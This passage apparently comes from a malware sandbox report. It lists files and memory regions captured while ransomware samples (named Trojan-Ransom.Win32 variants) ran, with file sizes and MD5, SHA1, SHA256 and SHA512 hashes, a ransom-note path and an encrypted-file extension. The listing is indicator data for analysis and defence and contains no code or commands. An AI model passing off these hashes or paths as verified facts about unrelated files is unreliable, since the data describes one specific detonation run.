                      SHA512

                      76b311fbacef57792ff76f893676aefb64d4c5718fe2da9070cbf9c2c14a19edba14952ec3ed40a11ad28325c00d6fd8d8fadd3bd26129720d6fcb5a645c7b67

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Crypmod.aald-521e8b48c7c4d54ffeaee381118505215b0dd36ada17b5452e1eaacac4e3a70e.exe
                      Filesize

                      380KB

                      MD5

                      cefeba2bba1776d8b904415f52e14b7f

                      SHA1

                      733ab20ca21d86cd9a5fe4722c11783e51f88c9f

                      SHA256

                      521e8b48c7c4d54ffeaee381118505215b0dd36ada17b5452e1eaacac4e3a70e

                      SHA512

                      c869434f72fecc2b183ffd7d768a891a99e46d323a7f48da4db097f0a13e3510c3279ad8209b5ac2a6249c642ffb3ab749d4b225af5f6e2ee551e235b668c18e

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Foreign.nzwr-d58a98fb618ee4194332e70779b2f2f78ec569e955c3b204ae6705ddbb13dbed.exe
                      Filesize

                      688KB

                      MD5

                      81fa26047d27d53c064ecb143ad8b9b5

                      SHA1

                      96331f8c62c36dbb313060774785028dfc3a7889

                      SHA256

                      d58a98fb618ee4194332e70779b2f2f78ec569e955c3b204ae6705ddbb13dbed

                      SHA512

                      1235ab2d8e39c192ed2cae66ad5b6b9497f71fde4adda62e4c3dde18b69fcc1baa2a48b6007524c05bfec5bfa5e8a60665e9c1de2c48cdcb4d9b90454e138d8d

                      Download Submit

                    • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Gen.hee-7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57.exe
                      Filesize

                      443KB

                      MD5

                      fd5ae61959c9590036881cb809891029

                      SHA1

                      f930d520913b407ab3cb5d7ecf5ee2a7dca1c071

                      SHA256

                      7cf39ebb4409b13a7c153abff6661cc4d28d8d7109543d6419438ac9f2f1be57

                      SHA512

                      2feb832498370c7635d42913a4328b3ba797e67cf6f7cdadc769dd549b251b05f340899229fcf76ccc1f8fe5d1512d769f581079ac06c6459669d536ba1c1fbb

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini
                      Filesize

                      669B

                      MD5

                      e29f641dd951eeaca4890622b50a2442

                      SHA1

                      1bfe431338ece2cf182216d02f7d96be1230a0ba

                      SHA256

                      07e9dbdadfc6794271d06c1eb1c3108aebb9e220cbdc1bcd573747a92ab80657

                      SHA512

                      a6c7074da01f85b82fb4263ecae293f9fbf40aa820dc2c7057e4d7fc4f3306014efd86bacee8b97ca461f36e0759b906288512b93f6fafe3a5271453b192267c

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini
                      Filesize

                      377B

                      MD5

                      a51e9a11316a3441098a9fd9c0c33ebe

                      SHA1

                      cbd579d3fe934f009aa0a1e8e5a56a9d4d2659cd

                      SHA256

                      0a7b0d5564c3dd702d750bb6813555f625329e6e380d5c22020c50ed41a3177b

                      SHA512

                      54b3d3a4880c197688fb3ba01b8b9c0a2f8ef93e15ccc682d92520692e710859fc0595c9d91f2e8d22df616e840c6bf9bd7069540bed15bb3f603b9a823fcf17

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini
                      Filesize

                      916B

                      MD5

                      e719765e139dd67e925670f23f21db17

                      SHA1

                      21871582e1f7d80e65ed7ee63fdd413f6ac63826

                      SHA256

                      642ee2963624d083a0c75433216c14bd339d305841ab1e70d77a4e8f37d9f6c3

                      SHA512

                      f25c5f30cae1d782dda95fe4f256590a1330d7e24e02049eac0295b52767418f404cd9e5583fd0827579a5f637fe27c28935d27385973061f4cc8150034a5ade

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini.prev
                      Filesize

                      213B

                      MD5

                      a35f5544e35fa228591a82e76ce1241e

                      SHA1

                      1920ea2d6e5934bdaccdda7c34323048eb930847

                      SHA256

                      99d059f08954377d5cc91d05e77d052d5d00d6cff4eebdaed791d3c45d7912a3

                      SHA512

                      d193360e84cd6933f610983a5b30d71e405fef123f14910b476df6dea50d1b4064784b495e325f69b60348e994d5055440ddbf234680a2a90fc3eb6c70e46c7c

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini.temp
                      Filesize

                      597B

                      MD5

                      96ffe05ca91c04e29728f972823af6c8

                      SHA1

                      8cfcdda1ec99e6925a07bf95c7b2dc327a89e581

                      SHA256

                      1e17f6b5e508bd0f975618e5b943ccaf2c80aff441072402aeb2f0d07ef9e34a

                      SHA512

                      2dd630cef9604b6d424e69274eb95ab2696bb623a14c34bf57f6a9fdb17c35d012fc612b39e7277e60f0d8ad661a7e04523896ce3714344fb3914889d9f80ded

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini.temp
                      Filesize

                      1KB

                      MD5

                      e93a4a863cf3686f6351193fb5137e76

                      SHA1

                      0aa792f52a8e83710fffed813bc77d6c6a4913b0

                      SHA256

                      3d8a798f8223f6f228c8d1b0d0ee8a84a316a24a40c1cd6a9c44eabc145646c9

                      SHA512

                      76f648cb1109f2e4407276953c1ad0df27614a92e342ab5bd065cdc65590b4255b0fdba37729b0158cb1f1ad4676b13a9e04e5cf2fdf7363fbee86dc2881165a

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Folder configuration\favorites.ini.temp
                      Filesize

                      857B

                      MD5

                      ff1f4ff687a6708f4faeec9f544ed845

                      SHA1

                      4d683cd827558b625ac7a86aa029d8a79eb2cf77

                      SHA256

                      ff6835d38b5606967a7a6c24e42fe3bfc88e440b85d700880be5b594877c6408

                      SHA512

                      fcbfd792def7bc5a4421db6a88262780c62b04e0f18c66c48c7b654158dd2217832e28c625136c4643174f1945ab05106bdbc6d4c84b8f21ea1d4fef5b5eab13

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Log\explorer.log
                      Filesize

                      3KB

                      MD5

                      371d75393258c8837a5e7e190cde6c37

                      SHA1

                      cc4dff14f241319268344be3d9530a357a57f127

                      SHA256

                      f19e2468f89dd2ddc296d8018e2750327042d4705d5044b26a69b3b0e61f7411

                      SHA512

                      c9d6beb4902160b2cc0caf14d6e37d71724d6936423829478d0e579aae8990f99870cdea73e8b2d70001eed907eb6aebceb0999b2146d9943bff024c1783cbd6

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Log\explorer.log
                      Filesize

                      5KB

                      MD5

                      370c46f6402abdce3cdb40023aa0806a

                      SHA1

                      e876336f94bb335d480178af3741585b9c59558c

                      SHA256

                      5f235ad7eb21e11f9b25f9d0c252df86ea93c8132e77f9911c909cfa44de6b1b

                      SHA512

                      199fa57f4ec229b54dae3385bfcee61945a4b8eb32964676c60bfd8f616ee4bcf6d97d2f0d33530193f60470c25229386594584fbc6fd7a090d54e7acf4994e1

                      Download Submit

                    • C:\Users\Admin\Documents\Chameleon files\Log\explorer_error.log
                      Filesize

                      28KB

                      MD5

                      c81bc577d6a8209dab30e83db1164409

                      SHA1

                      854460bae9702c98dbdabcbcf8ce9051bea88b80

                      SHA256

                      47f597b4429e235024e19152ed8159797f938bd4f3507b625f4ef5795827591a

                      SHA512

                      00804e331e7f0b7520ea9d62e482285e7f272f39f5311d459c6fb821b9ccef25ac240830d0f498c991d4764c94267b7d32dd15fe2ad9f891f8f14caa8cb08e74

                      Download Submit

                    • C:\Users\Public\Desktop\Chameleon Explorer.lnk
                      Filesize

                      2KB

                      MD5

                      bcbd1e6a3d9e6f3b733ff965298b67c6

                      SHA1

                      cb3b45fe66072242a5aaf80f783b36ca7747f75a

                      SHA256

                      6d994528e00d684fa6560b6eae3e44fb1f56a4d1d6c46f81870f9b94075b36b7

                      SHA512

                      0c5f7517e4c7cfe4133e5e88f09e657f15e3c436d5191c24cf10616bc678ba88fecd040a6f8f11b6320c0ec9e48b9dbb7517855d1fdd2957fa7b5bb800f35270

                      Download Submit

                    • C:\Users\Public\Videos\READ_ME.txt
                      Filesize

                      1KB

                      MD5

                      8554440d3877ab3c6a001d07c6f93ebe

                      SHA1

                      1bfb9ab69d24ea7f07130dd9c3a73e41a98da081

                      SHA256

                      486f966ce350010e8e1fde1dc4778707a8404ccc7b19523498b2f7951a8c7783

                      SHA512

                      eeba934a164d2ad27855e5f2b915a45d54b8d945c347092a1d6551eba83c088e3797a7b7e3dabcb629001aaa0e810399ef762352689a7e54815667f29462e967

                      Download Submit

                    • F:\$RECYCLE.BIN\S-1-5-21-3551809350-4263495960-1443967649-1000\desktop.ini.id-D0CD2F5E.[[email protected]].arrow
                      Filesize

                      1KB

                      MD5

                      ea7010fb689a6a5537f2f6a85e09863b

                      SHA1

                      48c9ef8daf4bf85cfdb377c8370feb5c2003b1a8

                      SHA256

                      55bde566211b0fad0b25c31aff9dee96cac2d58da929871ea4ca6c2e7279a509

                      SHA512

                      f4816d70e2e3265641f680c9431aafd2e5ea3fa3693f07575cbe9aaa9cc03aed52b24f67e307ab44091f437ab5cfd9533cf4c665b5d565cc27c3a93d92a8db47

                      Download Submit

                    • \Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Filesize

                      14.4MB

                      MD5

                      92a3d0847fc622b31f2d0c273a676c0e

                      SHA1

                      e642d694367cc98a8863d87fec82e4cf940eb48a

                      SHA256

                      9a9923c08d3fc5937b6ed189e20cf416482a079bc0c898c4ed75329e0ee3ae89

                      SHA512

                      01d13fd9a0dd52bc2e3f17af7a999682201c99ecf7218bca254a4944a483fd1dec2a3e6d59def501a024ad760b849787902ecb55bd33d23fa9651c0a7689cd1c

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\is-J8PST.tmp\cexplorer.tmp
                      Filesize

                      1.1MB

                      MD5

                      729bc0108bcd7ec083dfa83d7a4577f2

                      SHA1

                      0b4efa5e1764b4ce3e3ae601c8655c7bb854a973

                      SHA256

                      b1c68b1582ebb5f465512a0b834ccac095460b29136b6c7eea0475612bf16b49

                      SHA512

                      49c83533ce88d346651d59d855cff18190328795401c1277f4e3d32ff34f207d2c35f026785aa6c4a85624d88bf8c927654907faf50db1d57447730d9d6ac44c

                      Download Submit

                    • \Users\Admin\AppData\Roaming\cexplorer.exe
                      Filesize

                      6.5MB

                      MD5

                      d8388140b196952bc419141fa07ac0c9

                      SHA1

                      71e6f4a14964c39a9b827479ffe90ec07b9145e3

                      SHA256

                      6d77ff618ac5c4306dea8f34e66092e146f172570e88a3ac05166068e5a4abd6

                      SHA512

                      4f8e089eba0cc90af09321cc83297cf763b9899cb65cd1ebd44697866e7458fa5ba1f3ace9e6cf7875c92fa5ac7d7fe85ff3a4af0c6f659b1849c03bba674e22

                      Download Submit

                    • \Users\Admin\AppData\Roaming\update.exe
                      Filesize

                      658KB

                      MD5

                      347ecde6b031093be884e55e98de6c08

                      SHA1

                      47accc91f6bda29250ee52fe61a1912ad2f66591

                      SHA256

                      59a9102c4ba03020b4a73d8f31cd2ff6d68a3293bd288f00eb1a16ef4ab04518

                      SHA512

                      30c78c75bce439982687489975720d7a185bca50dd69631c4a9b51d6b9ee29f9cefb03ae059cf83ab664a066d85a021f79efa547ef06830a5b74aaafa1398130

                      Download Submit

                    • memory/212-19145-0x0000000000400000-0x0000000001438000-memory.dmp

                      Filesize

                      16.2MB

                      Download

                    • memory/1572-45-0x0000000000040000-0x000000000007E000-memory.dmp

                      Filesize

                      248KB

                      Download

                    • memory/1572-367-0x0000000000330000-0x0000000000338000-memory.dmp

                      Filesize

                      32KB

                      Download

                    • memory/1596-2287-0x0000000000400000-0x0000000000467000-memory.dmp

                      Filesize

                      412KB

                      Download

                    • memory/1596-1252-0x0000000000400000-0x0000000000467000-memory.dmp

                      Filesize

                      412KB

                      Download

                    • memory/1700-2033-0x00000000020B0000-0x00000000021EC000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/1700-2037-0x0000000010000000-0x0000000010089000-memory.dmp

                      Filesize

                      548KB

                      Download

                    • memory/1700-7828-0x0000000000400000-0x0000000000443000-memory.dmp

                      Filesize

                      268KB

                      Download

                    • memory/2212-27-0x0000000000400000-0x000000000049F000-memory.dmp

                      Filesize

                      636KB

                      Download

                    • memory/2212-1909-0x0000000000400000-0x000000000049F000-memory.dmp

                      Filesize

                      636KB

                      Download

                    • memory/2212-404-0x0000000000400000-0x000000000049F000-memory.dmp

                      Filesize

                      636KB

                      Download

                    • memory/2368-21362-0x0000000000400000-0x0000000000444000-memory.dmp

                      Filesize

                      272KB

                      Download

                    • memory/2584-20901-0x0000000000400000-0x000000000042C000-memory.dmp

                      Filesize

                      176KB

                      Download

                    • memory/2724-15758-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2724-37852-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2724-12332-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2724-37-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2724-20489-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/2760-23754-0x0000000001F70000-0x00000000020A8000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2784-13043-0x0000000000400000-0x000000000050B000-memory.dmp

                      Filesize

                      1.0MB

                      Download

                    • memory/2784-33-0x0000000000400000-0x000000000050B000-memory.dmp

                      Filesize

                      1.0MB

                      Download

                    • memory/2844-10616-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/2844-16-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/2844-17-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/2844-18-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/2844-14297-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/2844-10730-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3244-374-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-381-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

                      Filesize

                      4KB

                      Download

                    • memory/3244-376-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-382-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-372-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-391-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-390-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-1251-0x0000000000570000-0x000000000057A000-memory.dmp

                      Filesize

                      40KB

                      Download

                    • memory/3244-378-0x0000000000400000-0x0000000000438000-memory.dmp

                      Filesize

                      224KB

                      Download

                    • memory/3244-1338-0x0000000000580000-0x000000000059E000-memory.dmp

                      Filesize

                      120KB

                      Download

                    • memory/3244-1545-0x00000000005A0000-0x00000000005AA000-memory.dmp

                      Filesize

                      40KB

                      Download

                    • memory/3268-18500-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-17498-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-18499-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-18498-0x0000000000400000-0x0000000001438000-memory.dmp

                      Filesize

                      16.2MB

                      Download

                    • memory/3268-18320-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-18318-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-17363-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-12873-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3268-19126-0x0000000000400000-0x0000000001438000-memory.dmp

                      Filesize

                      16.2MB

                      Download

                    • memory/3268-12358-0x0000000000400000-0x0000000001438000-memory.dmp

                      Filesize

                      16.2MB

                      Download

                    • memory/3268-12867-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/3468-22537-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/3712-19319-0x0000000000400000-0x0000000000A39000-memory.dmp

                      Filesize

                      6.2MB

                      Download

                    • memory/3824-1671-0x0000000000400000-0x0000000000428000-memory.dmp

                      Filesize

                      160KB

                      Download

                    • memory/3824-20407-0x0000000000400000-0x0000000000428000-memory.dmp

                      Filesize

                      160KB

                      Download

                    • memory/3824-8688-0x0000000000400000-0x0000000000428000-memory.dmp

                      Filesize

                      160KB

                      Download

                    • memory/3828-8689-0x0000000000400000-0x000000000052D000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/3828-20286-0x0000000000400000-0x000000000052D000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/3892-10857-0x0000000000400000-0x00000000004AD000-memory.dmp

                      Filesize

                      692KB

                      Download

                    • memory/3892-10731-0x0000000000400000-0x00000000004AD000-memory.dmp

                      Filesize

                      692KB

                      Download

                    • memory/3916-23693-0x0000000003DE0000-0x0000000003EA4000-memory.dmp

                      Filesize

                      784KB

                      Download

                    • memory/4584-23159-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-24522-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-19838-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-20040-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-24510-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-23814-0x0000000007610000-0x0000000007748000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/4584-23800-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-19889-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4584-22088-0x0000000005E30000-0x0000000005E40000-memory.dmp

                      Filesize

                      64KB

                      Download

                    • memory/4584-19934-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4876-20205-0x0000000000400000-0x0000000001438000-memory.dmp

                      Filesize

                      16.2MB

                      Download

                    • memory/4876-19931-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download

                    • memory/4876-19925-0x0000000140000000-0x00000001405E8000-memory.dmp

                      Filesize

                      5.9MB

                      Download